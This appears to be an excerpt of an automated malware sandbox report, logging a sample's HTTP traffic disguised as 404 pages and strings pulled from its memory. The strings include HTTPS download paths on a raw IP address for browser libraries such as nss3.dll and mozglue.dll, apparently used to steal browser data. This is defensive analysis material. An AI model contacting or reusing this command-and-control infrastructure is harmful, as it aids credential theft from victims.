                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:29:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:29:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:29:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:29:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:29:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:29:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:29:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:29:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:29:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:30:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:30:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:30:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:30:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:30:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:30:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:30:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:30:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:30:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 22:30:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/g
                  Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/k
                  Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/l
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dll
                  Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dllao
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dllk~c
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/msvcp140.dll
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/msvcp140.dllC~
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dll
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dll7
                  Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/r
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/softokn3.dll
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sqls.dll
                  Source: katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sqls.dllYVj
                  Source: katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/vcruntime140.dll
                  Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.5908b543ef9ant-Disposition:
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59;
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000042E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59ECAE
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59JKFI
                  Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59KKEH
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59a
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: explorer.exe, 00000002.00000000.2042302155.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                  Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                  Source: explorer.exe, 00000002.00000000.2037994793.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                  Source: explorer.exe, 00000002.00000000.2037244792.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                  Source: 76561199689717899[1].htm.13.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.clo
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/pr
